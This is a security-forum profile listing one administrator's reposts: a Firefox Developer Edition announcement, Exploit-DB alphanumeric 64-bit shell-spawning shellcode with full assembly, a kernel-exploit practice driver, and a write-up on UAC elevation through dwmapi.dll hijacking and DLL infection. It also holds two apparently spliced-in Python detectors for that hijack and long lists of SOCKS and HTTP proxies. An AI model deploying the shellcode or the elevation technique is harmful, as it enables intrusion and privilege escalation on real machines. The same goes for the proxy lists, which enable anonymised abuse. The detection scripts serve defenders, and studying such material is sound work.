
Nytro
Administrators
  • Posts: 18772
  • Joined
  • Last visited
  • Days Won: 729

Everything posted by Nytro

  1. Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition

on November 10, 2014 by Dave Camp

Developers are critical to the continued success of the Web. The content and apps they create compel us to come back to the Web every day, whether on a computer or mobile phone. In celebration of the 10th anniversary of Firefox, we’re excited to unveil Firefox Developer Edition, the first browser created specifically for developers.

Ten years ago, we built Firefox for early adopters and developers to give them more choice and control. Firefox integrated WebAPIs and Add-ons to enable people to get the most out of the Web. Now we’re giving developers the whole browser as a hard-hat area, allowing us to bring front and center the features most relevant to them. Having a dedicated developer browser means we can tailor the browsing experience to what developers do every day. Because Firefox is part of an open-source, independent community and not part of a proprietary ecosystem, we’re able to offer features other browsers can’t by applying our tools everywhere the Web goes, regardless of platform or device.

One of the biggest pain points for developers is having to use numerous siloed development environments in order to create engaging content or for targeting different app stores. For these reasons, developers often end up having to bounce between different platforms and browsers, which decreases productivity and causes frustration. Firefox Developer Edition solves this problem by creating a focal point to streamline your development workflow. It’s a stable developer browser which is not only a powerful authoring tool but also robust enough for everyday browsing. It also adds new features that simplify the process of building for the entire Web, whether targeting mobile or desktop across many different platforms.

If you’re an experienced developer, you’ll already be familiar with the installed tools so you can focus on developing your content or app as soon as you open the browser. There’s no need to download additional plugins or applications to debug mobile devices. If you’re a new Web developer, the streamlined workflow and the fact that everything is already set up and ready to go makes it easier to get started building sophisticated applications.

So what’s under the hood? The first thing you’ll notice is the distinctive dark design running through the browser. We applied the developer tools theme to the entire browser. It’s trim and sharp and focused on saving space for the content on your screen. It also fits in with the darker look common among creative app development tools.

We’ve also integrated two powerful new features, Valence and WebIDE, that improve workflow and help you debug other browsers and apps directly from within Firefox Developer Edition.

Valence (previously called Firefox Tools Adapter) lets you develop and debug your app across multiple browsers and devices by connecting the Firefox dev tools to other major browser engines. Valence also extends the awesome tools we’ve built to debug Firefox OS and Firefox for Android to the other major mobile browsers including Chrome on Android and Safari on iOS. So far these tools include our Inspector, Debugger and Console and Style Editor.

WebIDE allows you to develop, deploy and debug Web apps directly in your browser, or on a Firefox OS device. It lets you create a new Firefox OS app (which is just a web app) from a template, or open up the code of an existing app. From there you can edit the app’s files. It’s one click to run the app in a simulator and one more to debug it with the developer tools.

Firefox Developer Edition also includes all the tools experienced Web developers are familiar with, including:

  • Responsive Design Mode – see how your website or Web app will look on different screen sizes without changing the size of your browser window.
  • Page Inspector – examine the HTML and CSS of any Web page and easily modify the structure and layout of a page.
  • Web Console – see logged information associated with a Web page and use Web Console to interact with a Web page using JavaScript.
  • JavaScript Debugger – step through JavaScript code and examine or modify its state to help track down bugs.
  • Network Monitor – see all the network requests your browser makes, how long each request takes and details of each request.
  • Style Editor – view and edit CSS styles associated with a Web page, create new ones and apply existing CSS stylesheets to any page.
  • Web Audio Editor – inspect and interact with Web Audio API in real time to ensure that all audio nodes are connected in the way you expect.

Give it a try and let us know what you think. We’re keen to hear your feedback.

More Information: Download Firefox Developer Edition | Release Notes

Source: https://hacks.mozilla.org/2014/11/mozilla-introduces-the-first-browser-built-for-developers-firefox-developer-edition/
  2. Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)

#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt

# Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
# (c) 2014 Breaking Technology, Inc.
# http://breaking.technology/
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o

.section .data
.section .text
.globl _start

_start:                         # "XX"
    pop %rax                    # 'X'  add $0x8, %rsp ; so we dont overwrite the return pointer
    pop %rax                    # 'X'  add $0x8, %rsp ; so we dont overwrite the return pointer

prepare_ff:                     # "j0TYX45Pk13"
    push $0x30                  # 'j0'
    push %rsp                   # 'T'
    pop %rcx                    # 'Y'   %rcx points to $0x30
    pop %rax                    # 'X'   %rax = 0x30
    xor $0x35, %al              # '45'  %rax = 0x05
    push %rax                   # 'P'   (%rcx) = 0x05
    imul $0x33, (%rcx), %esi    # 'k13' %esi = 0x000000ff

prepare_f8:                     # "VX4047"
    # mov %rsi, %rax
    push %rsi                   # 'V'
    pop %rax                    # 'X'   %rax = %rsi = 0x000000ff
    # mov $0xf8, %al
    xor $0x30, %al              # '40'
    xor $0x37, %al              # '47'  %rax = 0x000000f8

write_negative_8:               # "3At1At1qu1qv1qw"
    # mov %eax, 0x74(%rcx)
    xor 0x74(%rcx), %eax        # '3At'
    xor %eax, 0x74(%rcx)        # '1At' 0xf8
    # mov %sil, 0x75 - 0x77 + rcx
    xor %esi, 0x75(%rcx)        # '1qu' 0xff
    xor %esi, 0x76(%rcx)        # '1qv' 0xff
    xor %esi, 0x77(%rcx)        # '1qw' 0xff
    # -8 is now on the stack as a 32-bit dword
    # at 0x74(%rcx)

read_negative_8:                # "Hcyt"
    # move long (dword) to signed quadword
    # mov -8, %rdi
    movslq 0x74(%rcx), %rdi     # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )

get_return_pointer:             # "14yH34y"
    # mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
    # OR IN DECIMAL:
    # mov -16(%rcx), %rsi
    xor %esi, (%rcx, %rdi, 2)   # '14y'
    xor (%rcx, %rdi, 2), %rsi   # 'H34y'

prepare_key:                    # "hj5XVX"
    # put the xor key into %eax
    push $0x5658356a            # 'hj5XV' pushed backwards because x86 stack.
    pop %rax                    # 'X'

decode_encoded_code:            # "1FK"
    xor %eax, 0x4b(%rsi)        # '1FK' encoded_code ; pops & syscall decoded

decode_encoded_data:            # "1FSH3FO"
    xor %eax, 0x53(%rsi)        # '1FS'  encoded_data + 4 ; "/sh\0" decoded
    xor 0x4f(%rsi), %rax        # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax

begin_stack_setup:              # "PT"
    push %rax                   # 'P' push "/bin/sh\0"
    push %rsp                   # 'T' push pointer to /bin/sh

zero_rax:                       # "j0X40"
    # xor %rax, %rax
    push $0x30                  # 'j0'
    pop %rax                    # 'X'
    xor $0x30, %al              # '40' %rax is NULL

end_stack_setup:                # "PP"
    push %rax                   # 'P' push NULL
    push %rax                   # 'P' push NULL

mov_3b_al:                      # "4u4N"
    # mov $0x3b, %al
    xor $0x75, %al              # '4u'
    xor $0x4e, %al              # '4N' %al = 0x4e xor 0x75 = $0x3b
    # this is for syscall ^

begin_stack_run:                # "Z"
    pop %rdx                    # 'Z' mov $0x00, %rdx ; %rdx = NULL

encoded_code:                   # "4jWS"
    # 0x34 0x6a 0x57 0x53
    # AFTER XOR MAGIC:
    .byte 0x34                  # "\x5e" pop %rsi ; %rsi = NULL
    .byte 0x6a                  # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
    .byte 0x57                  # "\x0f"
    .byte 0x53                  # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
    # syscall(%rax) = function(%rdi,%rsi,%rdx);
    # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);

encoded_data:                   # "EW18EF0V" turns into "/bin/sh\0"
    # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
    # AFTER XOR MAGIC:
    .byte 0x45                  # /
    .byte 0x57                  # b
    .byte 0x31                  # i
    .byte 0x38                  # n
    .byte 0x45                  # /
    .byte 0x46                  # s
    .byte 0x30                  # h
    .byte 0x56                  # \0

Source: http://www.exploit-db.com/exploits/35205/
  3. KdExploitMe

A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

Source: https://github.com/clymb3r/KdExploitMe
  4. Passive UAC Elevation

I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll.

LoadLibrary

This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file, the system will first check the KnownDlls registry key for the path; if it's not found there, then the system will look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64. If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; however, the dll must meet the following criteria:

  • The application must load the dll by its name and not the full path (this is common).
  • The dll must not exist in HKLM\SYSTEM\Control\Session Manager\KnownDLLs.
  • The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa).
  • The dll should exist in system32 or syswow64; special paths don't appear to work.

ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher "Adobe Systems Incorporated" and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll).

[Image caption: Is it a real flash update? Is it just ZeroAccess? Nobody knows.]

A Less Invasive Method

What if there was a folder where 90% of the applications that require UAC elevation reside, and what if it was writable from a non-elevated process? Well, it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherlode: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it to the downloads folder, and run a setup file. Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll; however, this is a fairly easy fix: dll infection.

Writing a DLL Infector

My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disables and overwrites the bound imports directory with the new section header, appends the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section. All we need now is some code for the section.

The Shellcode

The obvious choice was to make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros; I'll quickly run over how it works.

  • Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH.
  • Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll.
  • Uses a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA.
  • Opens the current process token and queries it to confirm the application we are running from is UAC elevated.
  • Gets the path of cmd.exe then executes it (UAC elevated of course).
  • Passes execution back to the real dwmapi.dll entry point so execution can continue.

Putting It All Together

The final product infects dwmapi.dll with our shellcode and places it in the download folder; once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned (because of Wow64FsRedirect and the fact that most setups run under wow64, we can use the same code on 32-bit and 64-bit Windows). I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator

Posted by TM at 11:03 AM

Source: MalwareTech: Passive UAC Elevation
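The search-order criteria listed in the post can be turned into a routine check for a planted DLL. The following is an added example, not MalwareTech's code: it lists DLLs in a directory (by default the user's Downloads folder) that share a name with a DLL shipped in System32/SysWOW64 but are not on the KnownDLLs list, which is exactly what a dropped dwmapi.dll looks like from the defender's side. The core check is a pure function that runs anywhere on constructed data; the registry and directory wiring only runs on Windows. The function names, the registry-reading helper and the sample file names are assumptions made for this example.

```python
"""Added example (not MalwareTech's code): detect a DLL planted for the
search-order hijack described above, such as a dwmapi.dll sitting in the
Downloads folder.

A DLL in the scanned directory is reported when its name matches a DLL that
lives in System32/SysWOW64 and that name is NOT on the KnownDLLs list
(KnownDLLs are always resolved from the system directory, so they cannot be
shadowed by a copy next to the executable). All names are assumptions.
"""
import os
import sys
from pathlib import Path

KNOWN_DLLS_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"


def normalize(name: str) -> str:
    """Case-insensitive DLL name with the .dll suffix guaranteed."""
    n = name.strip().lower()
    return n if n.endswith(".dll") else n + ".dll"


def find_hijack_candidates(dir_files, system_dlls, known_dlls):
    """Return the sorted DLL names in dir_files that an application started
    from that directory would load instead of the real system copy."""
    system = {normalize(n) for n in system_dlls}
    known = {normalize(n) for n in known_dlls}
    hits = set()
    for f in dir_files:
        if not f.lower().endswith(".dll"):
            continue  # only DLLs take part in LoadLibrary name resolution
        n = normalize(f)
        if n in system and n not in known:
            hits.add(n)
    return sorted(hits)


def read_known_dlls():
    """Read the KnownDLLs names from the registry (Windows only)."""
    import winreg  # module only exists on Windows
    names = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KNOWN_DLLS_KEY) as key:
        i = 0
        while True:
            try:
                value_name, value, _ = winreg.EnumValue(key, i)
            except OSError:
                break  # no more values
            i += 1
            # DllDirectory / DllDirectory32 hold paths, not DLL names
            if isinstance(value, str) and not value_name.lower().startswith("dlldirectory"):
                names.append(value)
    return names


def scan_windows_host(directory=None):
    """Scan a directory (default: the user's Downloads folder) on a live Windows host."""
    windir = os.environ.get("SystemRoot", r"C:\Windows")
    system_dlls = set()
    for sub in ("System32", "SysWOW64"):
        p = Path(windir, sub)
        if p.is_dir():
            system_dlls.update(f.name for f in p.iterdir() if f.suffix.lower() == ".dll")
    target = Path(directory) if directory else Path.home() / "Downloads"
    files = [f.name for f in target.iterdir() if f.is_file()]
    return find_hijack_candidates(files, system_dlls, read_known_dlls())


# Constructed sample data (not taken from the page) for an offline run.
SAMPLE_DOWNLOADS = ["setup_installer.exe", "dwmapi.dll", "report.pdf",
                    "myhelper.dll", "kernel32.dll"]
SAMPLE_SYSTEM_DLLS = ["dwmapi.dll", "kernel32.dll", "ntdll.dll", "user32.dll"]
SAMPLE_KNOWN_DLLS = ["kernel32", "ntdll", "user32"]

if __name__ == "__main__":
    hits = (scan_windows_host() if sys.platform == "win32"
            else find_hijack_candidates(SAMPLE_DOWNLOADS, SAMPLE_SYSTEM_DLLS, SAMPLE_KNOWN_DLLS))
    for h in hits:
        print("possible search-order hijack:", h)
```

On the constructed data only dwmapi.dll is reported: kernel32.dll is also present in the folder but is protected by KnownDLLs, and myhelper.dll has no system counterpart to shadow. On a real host the same function is fed the actual System32/SysWOW64 listings and the live KnownDLLs values.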
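The infector described under "Writing a DLL Infector" leaves a recognisable footprint in the PE header: the entry point moves into a final, appended, executable section and the bound-import directory is zeroed. The following added example (not from the post or the UACElevator repository) parses those header fields with the standard library and flags that combination. A compiler-built DLL normally enters its first executable section, so an entry point in the last section, when that section is executable and is not the first executable one, is the signal worth alerting on; a zeroed bound-import directory is common in clean files and only corroborates it. The PE builder that produces the two sample images is a constructed fixture, and all function names are assumptions made here.

```python
"""Added example (not from the post or its UACElevator repository): a PE-header
heuristic for the infection pattern described above (appended section that
owns AddressOfEntryPoint, bound-import directory disabled). Parsing uses only
the standard library; build_sample_pe() makes constructed, header-only
fixtures, and all function names are assumptions made for this example.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
BOUND_IMPORT_INDEX = 11  # IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT


def parse_pe(data: bytes):
    """Return (entry_rva, size_of_image, (bound_rva, bound_size), sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = opt + (112 if magic == 0x20B else 96)  # PE32+ vs PE32 data directories
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    bound = struct.unpack_from("<II", data, dd_off + 8 * BOUND_IMPORT_INDEX)
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + 40 * i  # section headers follow the optional header
        name, vsize, va = struct.unpack_from("<8sII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "chars": chars})
    return entry, size_of_image, bound, sections


def appended_section_indicators(data: bytes) -> dict:
    """Evaluate header-level indicators of an appended entry-point section."""
    entry, _, (bound_rva, bound_size), sections = parse_pe(data)

    def holds(s, rva):
        return s["va"] <= rva < s["va"] + max(s["vsize"], 1)

    entry_idx = next((i for i, s in enumerate(sections) if holds(s, entry)), None)
    first_exec = next((i for i, s in enumerate(sections)
                       if s["chars"] & IMAGE_SCN_MEM_EXECUTE), None)
    last = len(sections) - 1
    last_exec = bool(sections[last]["chars"] & IMAGE_SCN_MEM_EXECUTE)
    entry_in_last = entry_idx == last and entry_idx != first_exec
    return {
        "entry_section": sections[entry_idx]["name"] if entry_idx is not None else None,
        "entry_in_last_section": entry_in_last,
        "last_section_executable": last_exec,
        "bound_imports_disabled": bound_rva == 0 and bound_size == 0,
        "suspicious": entry_in_last and last_exec,
    }


def build_sample_pe(section_specs, entry_rva, bound_dir=(0, 0)):
    """Constructed fixture: a minimal PE32+ header (not a loadable image).
    section_specs: list of (name, virtual_address, virtual_size, characteristics)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_specs), 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)       # PE32+ magic
    struct.pack_into("<I", opt, 16, entry_rva)  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 56, max(va + vs for _, va, vs, _ in section_specs))  # SizeOfImage
    struct.pack_into("<I", opt, 108, 16)        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * BOUND_IMPORT_INDEX, *bound_dir)
    secs = b"".join(struct.pack("<8sIIIIIIHHI", name, vs, va, vs, 0, 0, 0, 0, 0, ch)
                    for name, va, vs, ch in section_specs)
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


CODE = IMAGE_SCN_MEM_EXECUTE | 0x40000000 | 0x00000020  # execute | read | code
DATA = 0x40000000 | 0x00000040                          # read | initialized data

# Constructed samples: a normal two-section DLL, and the same DLL with an
# appended executable section that now owns the entry point.
CLEAN_DLL = build_sample_pe([(b".text", 0x1000, 0x2000, CODE),
                             (b".data", 0x3000, 0x1000, DATA)], entry_rva=0x1234)
INFECTED_DLL = build_sample_pe([(b".text", 0x1000, 0x2000, CODE),
                                (b".data", 0x3000, 0x1000, DATA),
                                (b".shell", 0x4000, 0x200, CODE)], entry_rva=0x4000)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_DLL), ("infected", INFECTED_DLL)):
        print(label, appended_section_indicators(img))
```

Run against a real file with `appended_section_indicators(open(path, "rb").read())`. Treat `suspicious` as a triage signal rather than a verdict: packers and some linkers also place the entry point in a late section, so the hit is worth a look, not an automatic block.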
  5. 08-11-14 | VIP Socks 5 (62)

Checked & filtered Socks5:

107.185.202.211:47603 108.162.40.186:52707 109.201.254.216:27976 122.221.158.15:31978 135.19.61.219:19291 142.196.192.133:18215 173.163.56.233:36847 173.217.23.79:41406 174.1.13.143:32726 174.55.203.55:26215 174.60.73.244:37761 180.64.68.40:443 184.166.178.229:30957 184.68.38.126:16444 194.44.175.41:1081 194.44.175.49:1081 198.27.67.24:53193 198.50.206.1:443 199.201.126.163:443 201.211.174.68:17195 202.154.102.12:20669 205.144.214.26:17232 216.171.240.92:1053 216.240.53.99:29059 222.114.148.54:443 23.106.90.230:11973 24.15.203.60:28655 24.192.152.155:15975 24.210.225.114:10557 24.49.210.53:48659 24.51.216.43:51039 24.59.45.242:15310 24.93.123.61:23183 31.129.91.129:33335 47.22.36.178:32754 5.11.76.183:36209 61.147.67.2:9123 66.168.209.178:20700 67.183.10.14:5105 68.225.150.49:7733 69.116.206.228:33198 70.126.76.45:32973 70.33.46.92:52784 70.64.144.216:46069 71.225.92.117:37467 71.9.127.141:36820 72.192.18.107:46478 74.132.8.66:29734 75.71.170.182:33683 75.84.52.36:43440 76.173.39.152:53356 78.237.248.24:17909 78.39.178.2:443 80.46.160.219:25712 80.47.184.124:49168 85.30.233.152:4013 89.44.109.160:13135 92.240.248.75:443 96.29.132.66:18433 96.3.48.98:24257 98.235.80.130:22831 99.229.170.129:41438

Source: 08-11-14 | VIP Socks 5 (62) - Pastebin.com
  6. 08-11-14 | Fast Proxy Server List (1655)

Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3)

1.160.80.14:8088 1.161.212.57:80 1.161.212.57:8080 1.164.212.237:8088 1.164.227.161:8088 1.168.89.87:8088 1.171.1.145:9064 1.172.2.142:9064 1.179.147.2:8080 1.192.116.28:8585 101.251.238.123:8080 101.69.168.210:9000 101.69.168.211:9000 101.79.246.16:8080 101.79.246.6:8080 103.16.114.11:3128 103.21.184.209:9064 103.246.244.161:44338 103.249.181.5:3128 103.25.155.51:8080 103.25.203.227:7808 103.25.203.227:8089 103.25.7.51:9064 103.254.126.38:80 103.254.126.38:8080 103.255.121.195:80 103.28.158.41:9064 103.28.255.90:9064 103.31.133.226:3128 103.4.167.186:80 106.3.40.249:8081 106.37.177.251:3128 107.150.224.29:80 107.150.224.29:8080 107.170.206.99:80 108.165.33.11:3128 108.165.33.3:3128 108.165.33.4:3128 108.165.33.7:3128 108.165.33.9:3128 108.47.12.2:8081 109.120.150.87:3128 109.228.25.136:80 109.251.10.3:8080 109.73.170.248:80 110.153.9.250:80 110.252.17.176:8585 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.54.224.226:8080 110.77.197.156:3128 110.77.212.109:8080 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:8085 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8080 111.1.32.24:8088 111.1.32.24:81 111.1.32.24:8123 111.1.32.24:9064 111.1.32.24:9999 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.163:81 111.1.36.164:80 111.1.36.164:83 111.1.36.164:84 111.1.36.164:85 111.1.36.164:86 111.1.36.165:80 111.1.36.165:81 111.1.36.165:83 111.1.36.2:80 111.1.36.21:80 111.1.36.21:81 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.21:86 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:82 111.1.36.23:83 111.1.36.23:85 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 
111.1.36.25:82 111.1.36.25:83 111.1.36.25:84 111.1.36.25:85 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:82 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.10.10.25:8123 111.10.100.152:8123 111.10.100.206:8123 111.10.100.229:8123 111.10.103.231:8123 111.10.103.8:8123 111.10.108.200:8123 111.10.108.89:8123 111.10.112.131:8123 111.10.113.41:8123 111.10.113.81:8123 111.10.114.109:8123 111.10.115.68:8123 111.10.116.124:8123 111.10.116.183:8123 111.10.116.254:8123 111.10.117.84:8123 111.10.118.13:8123 111.10.118.159:8123 111.10.118.97:8123 111.10.128.199:8123 111.10.129.83:8123 111.10.130.176:8123 111.10.136.193:8123 111.10.137.169:8123 111.10.138.190:8123 111.10.139.154:8123 111.10.139.3:8123 111.10.14.153:8123 111.10.144.188:8123 111.10.145.59:8123 111.10.147.224:8123 111.10.15.14:8123 111.10.153.171:8123 111.10.155.159:8123 111.10.156.35:8123 111.10.160.198:8123 111.10.160.72:8123 111.10.163.89:8123 111.10.165.125:8123 111.10.165.155:8123 111.10.166.130:8123 111.10.166.209:8123 111.10.167.246:8123 111.10.167.48:8123 111.10.167.90:8123 111.10.177.223:8123 111.10.178.246:8123 111.10.182.230:8123 111.10.189.17:8123 111.10.198.100:8123 111.10.83.93:8123 111.11.184.10:80 111.11.184.103:80 111.11.184.116:80 111.11.184.12:80 111.11.184.13:80 111.11.184.14:80 111.11.184.20:80 111.11.184.36:80 111.11.184.37:80 111.11.184.43:80 111.11.184.44:80 111.11.184.7:80 111.11.184.79:80 111.11.184.81:80 111.11.184.82:80 111.11.184.83:80 111.11.184.84:80 111.11.184.85:80 111.11.184.9:80 111.11.228.81:80 111.12.128.167:80 111.12.128.171:80 111.12.128.172:80 111.13.109.51:80 111.13.109.52:80 111.13.109.53:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.161.126.98:80 111.161.126.99:80 111.199.154.85:3128 111.206.81.248:80 111.221.1.254:8080 111.240.197.179:8088 111.240.97.94:9064 111.249.157.35:3128 
111.249.95.80:9064 111.250.189.156:9064 111.250.233.6:3128 111.251.232.188:8088 111.252.249.231:8088 111.252.32.180:8088 111.254.142.200:8088 111.254.181.19:8088 111.254.45.161:9064 111.254.59.13:8088 111.3.82.148:8123 111.68.121.141:8080 111.7.129.140:80 111.7.129.140:8088 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8088 111.7.129.151:80 111.7.129.151:8086 111.7.129.151:8088 111.7.129.160:80 111.7.129.162:80 111.8.20.136:80 111.8.20.141:80 111.9.124.150:8123 111.9.232.47:8123 111.9.233.113:8123 111.9.234.167:8123 111.9.234.193:8123 111.9.86.91:8123 111.93.234.98:3128 112.0.156.206:8123 112.1.184.23:8123 112.104.113.161:8088 112.105.215.77:8088 112.15.18.195:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.165.199:8123 112.18.166.52:8123 112.18.171.122:8123 112.18.173.110:8123 112.18.174.31:8123 112.18.174.44:8123 112.18.176.104:8123 112.18.179.49:8123 112.18.196.121:8123 112.18.197.25:8123 112.18.21.195:8123 112.18.28.19:8123 112.18.52.252:8123 112.18.64.138:8123 112.18.72.137:8123 112.18.75.133:8123 112.18.88.48:8123 112.20.105.244:8123 112.20.122.50:8123 112.20.124.199:8123 112.20.148.163:8123 112.21.232.53:8123 112.22.126.72:8123 112.22.225.5:8123 112.22.228.9:8123 112.236.157.53:8585 112.24.124.157:8123 112.248.244.7:8585 112.25.43.3:3128 112.25.43.3:80 112.3.202.185:8123 112.44.229.135:8123 112.44.233.136:8123 112.44.247.170:8123 112.44.247.4:8123 112.5.16.50:80 112.65.18.17:8080 112.65.19.122:8080 112.65.212.74:3128 112.65.44.67:3128 112.91.208.78:9999 113.105.224.79:80 113.105.224.85:80 113.105.93.79:80 113.105.93.80:80 113.107.57.76:80 113.15.164.62:9999 113.162.133.235:80 113.19.87.107:8080 113.197.80.253:8080 113.200.220.151:8123 113.200.68.26:9000 113.201.63.12:80 113.214.13.1:8000 113.4.10.26:8118 113.53.249.131:8080 113.57.230.49:81 114.112.192.195:3128 114.231.23.140:8585 114.24.116.237:8088 114.24.172.68:8088 
114.24.19.129:8088 114.24.4.19:8088 114.241.192.8:8585 114.247.120.114:3128 114.255.183.163:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.241.175:9064 114.27.126.120:8088 114.27.126.49:8088 114.27.18.90:8088 114.27.5.18:9064 114.27.79.210:8088 114.36.6.48:9064 114.37.20.206:9064 114.37.26.213:8088 114.37.44.121:8088 114.38.196.145:8088 114.38.230.187:8088 114.38.36.200:8088 114.38.89.72:8088 114.39.187.196:8088 114.39.250.91:8088 114.40.110.122:9064 114.40.111.61:8088 114.40.205.50:9064 114.43.45.139:8088 114.44.0.98:8088 114.46.137.195:9064 114.66.229.2:80 114.79.135.42:9064 115.124.74.178:8080 115.236.59.194:3128 115.239.248.235:8080 116.228.55.217:8003 117.135.250.62:80 117.135.252.2:80 117.136.165.129:8123 117.139.28.168:8123 117.139.28.217:8123 117.139.39.75:8123 117.139.44.192:8123 117.139.47.69:8123 117.139.63.57:8123 117.139.65.237:8123 117.146.116.67:80 117.146.116.68:80 117.146.116.69:80 117.147.192.81:8123 117.147.195.68:8123 117.147.224.35:8123 117.147.246.181:8123 117.149.199.30:8123 117.149.218.110:8123 117.149.224.26:8123 117.149.234.93:8123 117.158.1.210:9999 117.162.124.188:8123 117.162.164.138:8123 117.162.168.201:8123 117.162.171.179:8123 117.162.173.237:8123 117.162.174.251:8123 117.162.193.126:8123 117.162.195.173:8123 117.162.201.77:8123 117.162.204.120:8123 117.162.216.173:8123 117.162.233.65:8123 117.162.238.139:8123 117.162.247.203:8123 117.162.70.148:8123 117.162.74.225:8123 117.162.80.48:8123 117.162.83.114:8123 